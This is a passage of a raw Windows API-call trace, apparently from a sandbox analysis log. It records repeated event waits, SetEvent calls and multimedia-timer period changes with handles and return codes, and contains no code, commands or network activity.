0x0 [0270.433] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0270.464] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0270.507] SetEvent (hEvent=0x22c) returned 1 [0270.507] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0270.924] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0272.906] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0272.933] timeEndPeriod (uPeriod=0x1) returned 0x0 [0272.933] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0273.136] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0273.136] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0273.173] timeEndPeriod (uPeriod=0x1) returned 0x0 [0273.173] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0273.183] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0273.183] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0273.190] timeEndPeriod (uPeriod=0x1) returned 0x0 [0273.191] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0273.219] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0273.220] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0273.253] timeEndPeriod (uPeriod=0x1) returned 0x0 [0273.253] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0273.269] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0273.269] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0273.426] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0273.431] SetEvent (hEvent=0x20c) returned 1 [0273.431] SetEvent (hEvent=0x134) returned 1 [0273.431] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0273.452] SetEvent (hEvent=0x12c) returned 1 [0273.452] SetEvent (hEvent=0x1d0) returned 1 [0273.453] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0273.467] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0273.482] SetEvent (hEvent=0x12c) returned 1 [0273.482] SetEvent (hEvent=0x21c) returned 1 [0273.484] SetEvent (hEvent=0x1b8) returned 1 [0273.484] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0273.488] SetEvent (hEvent=0x1b8) returned 1 [0273.488] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0273.571] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0273.614] timeEndPeriod (uPeriod=0x1) returned 0x0 [0273.614] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0273.660] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0273.660] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0273.676] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0273.692] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0273.694] timeEndPeriod (uPeriod=0x1) returned 0x0 [0273.694] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0273.713] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0273.714] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0273.728] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0273.822] timeEndPeriod (uPeriod=0x1) returned 0x0 [0273.822] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0274.017] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0274.018] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0274.024] SetEvent (hEvent=0x1ac) returned 1 [0274.024] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0274.111] timeEndPeriod (uPeriod=0x1) returned 0x0 [0274.111] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0274.146] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0274.146] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0274.180] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0274.218] timeEndPeriod (uPeriod=0x1) returned 0x0 [0274.218] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0274.313] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0274.313] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0274.320] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0274.358] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0274.364] timeEndPeriod (uPeriod=0x1) returned 0x0 [0274.364] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0274.452] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0274.453] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0274.608] timeEndPeriod (uPeriod=0x1) returned 0x0 [0274.608] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0274.662] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0274.662] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0274.746] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0276.009] timeEndPeriod (uPeriod=0x1) returned 0x0 [0276.010] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0276.040] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0276.040] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0276.119] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0276.209] timeEndPeriod (uPeriod=0x1) returned 0x0 [0276.210] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0276.268] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0276.269] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0276.356] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0276.441] timeEndPeriod (uPeriod=0x1) returned 0x0 [0276.441] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0276.625] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0276.625] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0276.815] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0276.845] SetEvent (hEvent=0x22c) returned 1 [0276.845] SetEvent (hEvent=0x14c) returned 1 [0276.845] SetEvent (hEvent=0x1ac) returned 1 [0276.845] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0276.853] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0276.882] timeEndPeriod (uPeriod=0x1) returned 0x0 [0276.882] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0277.173] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0277.173] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0277.248] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0277.264] timeEndPeriod (uPeriod=0x1) returned 0x0 [0277.264] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0277.330] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0277.330] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0277.542] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0277.667] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0277.855] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0277.911] timeEndPeriod (uPeriod=0x1) returned 0x0 [0277.911] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0277.929] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0277.929] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0277.954] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0278.015] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0278.045] timeEndPeriod (uPeriod=0x1) returned 0x0 [0278.045] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0278.132] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0278.132] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0278.153] timeEndPeriod (uPeriod=0x1) returned 0x0 [0278.153] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0278.212] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0278.213] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0278.291] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0278.354] timeEndPeriod (uPeriod=0x1) returned 0x0 [0278.354] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0278.369] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0278.369] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0278.467] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0278.576] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0278.666] SetEvent (hEvent=0x134) returned 1 [0278.667] SetEvent (hEvent=0x21c) returned 1 [0278.667] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0278.729] SetEvent (hEvent=0x21c) returned 1 [0278.729] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0278.773] timeEndPeriod (uPeriod=0x1) returned 0x0 [0278.773] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0278.779] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0278.779] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0278.932] timeEndPeriod (uPeriod=0x1) returned 0x0 [0278.932] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0279.017] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0279.017] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0279.051] timeEndPeriod (uPeriod=0x1) returned 0x0 [0279.051] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0279.138] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0279.139] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0279.195] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0279.231] timeEndPeriod (uPeriod=0x1) returned 0x0 [0279.231] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0279.371] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0279.372] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0279.475] SetEvent (hEvent=0x1dc) returned 1 [0279.475] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0279.600] SetEvent (hEvent=0x21c) returned 1 [0279.600] SetEvent (hEvent=0x220) returned 1 [0279.600] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0279.625] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0279.872] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0279.917] SetEvent (hEvent=0x21c) returned 1 [0279.917] SetEvent (hEvent=0x190) returned 1 [0279.917] SetEvent (hEvent=0x14c) returned 1 [0279.917] SetEvent (hEvent=0x22c) returned 1 [0279.918] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0280.096] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0280.196] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0280.201] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0280.211] timeEndPeriod (uPeriod=0x1) returned 0x0 [0280.211] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0280.364] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0280.364] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0280.442] timeEndPeriod (uPeriod=0x1) returned 0x0 [0280.442] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0280.483] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0280.483] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0280.514] timeEndPeriod (uPeriod=0x1) returned 0x0 [0280.515] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0280.610] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0280.610] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0280.641] timeEndPeriod (uPeriod=0x1) returned 0x0 [0280.641] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0280.788] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0280.788] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0280.879] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0280.910] timeEndPeriod (uPeriod=0x1) returned 0x0 [0280.910] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0282.145] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0282.147] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0282.207] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0282.354] timeEndPeriod (uPeriod=0x1) returned 0x0 [0282.354] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0282.401] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0282.401] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0282.447] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0282.471] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0282.649] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0282.691] timeEndPeriod (uPeriod=0x1) returned 0x0 [0282.691] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0282.704] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0282.704] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0282.780] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0282.850] SetEvent (hEvent=0x1b8) returned 1 [0282.850] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0282.912] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0283.225] SetEvent (hEvent=0x184) returned 1 [0283.225] SetEvent (hEvent=0x134) returned 1 [0283.225] SetEvent (hEvent=0x21c) returned 1 [0283.225] SetEvent (hEvent=0x14c) returned 1 [0283.225] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0283.455] timeEndPeriod (uPeriod=0x1) returned 0x0 [0283.456] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0283.562] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0283.562] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0283.580] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0283.596] timeEndPeriod (uPeriod=0x1) returned 0x0 [0283.597] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0283.699] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0283.699] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0283.777] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0283.796] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0283.858] timeEndPeriod (uPeriod=0x1) returned 0x0 [0283.858] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0283.915] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0283.915] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0283.976] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0284.030] SetEvent (hEvent=0x214) returned 1 [0284.030] SetEvent (hEvent=0x198) returned 1 [0284.030] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0284.241] SetEvent (hEvent=0x214) returned 1 [0284.241] SetEvent (hEvent=0x12c) returned 1 [0284.241] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0284.367] timeEndPeriod (uPeriod=0x1) returned 0x0 [0284.367] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0284.378] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0284.378] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0284.483] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0284.497] timeEndPeriod (uPeriod=0x1) returned 0x0 [0284.497] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0284.558] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0284.558] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0284.715] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0284.931] timeEndPeriod (uPeriod=0x1) returned 0x0 [0284.931] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0284.942] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0284.943] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0284.996] timeEndPeriod (uPeriod=0x1) returned 0x0 [0284.996] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0285.111] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0285.111] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0285.148] SetEvent (hEvent=0x14c) returned 1 [0285.148] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0285.218] SetEvent (hEvent=0x104) returned 1 [0285.218] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0285.250] SetEvent (hEvent=0x104) returned 1 [0285.250] SetEvent (hEvent=0x134) returned 1 [0285.250] SetEvent (hEvent=0x1dc) returned 1 [0285.250] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0285.390] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0285.613] SetEvent (hEvent=0x1dc) returned 1 [0285.613] SetEvent (hEvent=0x104) returned 1 [0285.613] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0285.716] SetEvent (hEvent=0x12c) returned 1 [0285.716] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0285.796] SetEvent (hEvent=0x12c) returned 1 [0285.796] SetEvent (hEvent=0x220) returned 1 [0285.796] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0285.851] SetEvent (hEvent=0x1d0) returned 1 [0285.851] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0285.909] SetEvent (hEvent=0x1d0) returned 1 [0285.909] SetEvent (hEvent=0x22c) returned 1 [0285.909] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0285.976] SetEvent (hEvent=0x22c) returned 1 [0285.976] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0285.981] SetEvent (hEvent=0x22c) returned 1 [0285.981] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0286.042] timeEndPeriod (uPeriod=0x1) returned 0x0 [0286.042] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0286.076] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0286.076] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0286.373] timeEndPeriod (uPeriod=0x1) returned 0x0 [0286.373] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0286.519] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0286.519] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0286.570] timeEndPeriod (uPeriod=0x1) returned 0x0 [0286.570] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0286.582] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0286.582] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0286.592] timeEndPeriod (uPeriod=0x1) returned 0x0 [0286.592] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0286.791] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0286.792] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0286.856] SetEvent (hEvent=0x220) returned 1 [0286.856] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0286.870] SetEvent (hEvent=0x21c) returned 1 [0286.870] SetEvent (hEvent=0x184) returned 1 [0286.871] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0286.966] timeEndPeriod (uPeriod=0x1) returned 0x0 [0286.966] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0286.997] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0286.997] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0287.007] timeEndPeriod (uPeriod=0x1) returned 0x0 [0287.007] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0287.190] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0287.190] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0287.374] timeEndPeriod (uPeriod=0x1) returned 0x0 [0287.375] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0287.453] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0287.453] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0287.467] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0287.503] timeEndPeriod (uPeriod=0x1) returned 0x0 [0287.503] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0287.535] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0287.535] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0287.586] timeEndPeriod (uPeriod=0x1) returned 0x0 [0287.587] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0287.620] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0287.620] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0287.742] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0287.803] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0287.833] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0287.875] timeEndPeriod (uPeriod=0x1) returned 0x0 [0287.875] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0287.982] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0287.982] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0288.070] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0288.127] timeEndPeriod (uPeriod=0x1) returned 0x0 [0288.127] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0288.161] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0288.162] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0288.367] timeEndPeriod (uPeriod=0x1) returned 0x0 [0288.367] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0288.452] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0288.452] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0288.513] timeEndPeriod (uPeriod=0x1) returned 0x0 [0288.513] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0288.557] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0288.557] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0288.616] timeEndPeriod (uPeriod=0x1) returned 0x0 [0288.616] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0288.654] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0288.654] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0288.690] timeEndPeriod (uPeriod=0x1) returned 0x0 [0288.690] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0288.728] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0288.729] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0288.773] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0288.781] timeEndPeriod (uPeriod=0x1) returned 0x0 [0288.781] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0288.839] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0288.839] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0288.874] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0288.914] timeEndPeriod (uPeriod=0x1) returned 0x0 [0288.915] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0288.949] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0288.949] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0288.978] timeEndPeriod (uPeriod=0x1) returned 0x0 [0288.978] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0289.010] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0289.010] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0289.026] SetEvent (hEvent=0x1b8) returned 1 [0289.026] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0289.068] timeEndPeriod (uPeriod=0x1) returned 0x0 [0289.068] 